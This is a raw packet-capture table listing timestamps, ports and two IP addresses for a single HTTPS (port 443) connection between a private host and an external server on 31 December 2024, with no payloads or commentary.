Dec 31, 2024 09:44:14.792459965 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.792520046 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.792526960 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.792570114 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.792952061 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.792967081 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.793024063 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.793051004 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.793103933 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.793695927 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.793715000 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.793775082 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.793781996 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.793817043 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.794199944 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.794217110 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.794274092 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.794281960 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.794322014 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.794888973 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.794905901 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.794960976 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.794966936 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.795010090 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.795403957 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.795422077 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.795478106 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.795485020 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.795533895 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.839659929 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.839680910 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.839754105 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.839766979 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.839806080 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.089267015 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.089291096 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.089381933 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.089412928 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.089456081 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.089777946 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.089795113 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.089850903 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.089859009 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.089905977 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.090670109 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.090687990 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.090737104 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.090744019 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.090751886 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.090768099 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.090792894 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.090801954 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.090826035 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.090851068 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.091578960 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.091594934 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.091666937 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.091698885 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.091737986 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.092549086 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.092571020 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.092607021 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.092608929 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.092622995 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.092642069 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.092675924 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.092684031 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.092703104 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.092727900 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.093626022 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.093645096 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.093697071 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.093703985 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.093738079 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.094471931 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.094495058 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.094548941 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.094557047 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.094595909 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.095854998 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.095875025 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.095921040 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.095930099 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.095946074 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.095973969 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.096014023 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.096862078 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.096879005 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.096935987 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.096945047 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.097490072 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.097508907 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.097559929 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.097568035 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.098083973 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.098098993 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.098154068 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.098161936 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.098187923 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.098205090 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.098229885 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.098236084 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.098278999 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.099066019 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.099088907 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.099137068 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.099148989 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.099159956 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.099193096 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.099234104 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.100060940 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.100078106 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.100121975 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.100136042 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.100142956 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.100171089 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.100220919 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.101033926 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.101048946 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.101106882 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.101119041 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.101728916 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.101747036 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.101788998 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.101799965 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.101813078 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.102231026 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.102247000 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.102310896 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.102319002 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.103020906 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.103043079 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.103085041 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.103099108 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.103142023 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.103169918 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.103188992 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.103230000 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.141913891 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.141943932 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142065048 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.142097950 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142146111 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.142426968 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142446041 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142499924 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.142509937 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142549992 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.142638922 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142657042 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142716885 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.142724991 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.142761946 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.143409014 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.143428087 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.143484116 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.143491030 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.143528938 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.143759012 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.143785954 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.143822908 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.143835068 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.143884897 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.144423008 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.144444942 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.144493103 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.144500971 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.144547939 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.145689964 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.145714998 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.145759106 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.145767927 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.145778894 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.145807981 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.187725067 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.187752008 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.187823057 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.187848091 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.187894106 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.228780031 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.228801012 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.228879929 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.228907108 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.228946924 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.229127884 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.229144096 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.229195118 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.229202986 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.229223013 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.229244947 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.229599953 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.229617119 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.229654074 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.229669094 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.229686975 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.229701996 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.230391026 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.230406046 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.230462074 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.230472088 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.230513096 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.230848074 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.230865002 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.230916977 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.230925083 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.230966091 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.231107950 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.231126070 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.231164932 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.231172085 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.231194973 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.231214046 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.232573032 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.232588053 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.232671022 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.232678890 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.232723951 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.274614096 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.274636030 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.274791002 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.274821997 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.274868011 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.316301107 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.316323042 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.316371918 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.316392899 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.316437960 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.316458941 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.316513062 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.316557884 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.316576958 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.316659927 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.316677094 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.317126989 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.317147017 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.317189932 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.317205906 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.317229033 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.317990065 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.318007946 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.318058014 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.318072081 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.318082094 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.318097115 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.318109035 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.318141937 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.319508076 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.319525003 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.319631100 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.319660902 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.319708109 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.361478090 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.361502886 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.361670017 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.361726046 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.361776114 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.403363943 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.403393030 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.403505087 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.403527021 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.403584003 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.403711081 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.403728962 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.403769970 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.403775930 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.403800964 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.403821945 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.404155016 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404171944 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404223919 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.404231071 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404268026 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.404767036 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404787064 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404834032 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.404840946 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404854059 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404872894 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404898882 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.404906034 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.404926062 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.404939890 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.405399084 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.405414104 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.405467987 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.405473948 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.405515909 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.406363964 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.406380892 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.406435966 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.406450033 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.406461954 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.406497955 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.448438883 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.448465109 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.448529959 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.448554993 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.448570013 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.448587894 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.491578102 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.491606951 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.491646051 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.491664886 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.491681099 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.491709948 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.491745949 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.492250919 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.492273092 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.492315054 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.492324114 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.492500067 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.492520094 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.492548943 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.492554903 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.492578983 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.493325949 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.493352890 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.493402004 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.493410110 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.493422031 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.493441105 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.493467093 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.493479967 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.493495941 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.494291067 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.494313002 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.494355917 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.494364023 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.537810087 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.537839890 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.537940979 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.537961006 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.577919960 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.577945948 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.578048944 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.578075886 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.578237057 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.578258038 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:15.578288078 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:15.578294992 CET	443	49707	198.252.105.91	192.168.2.8
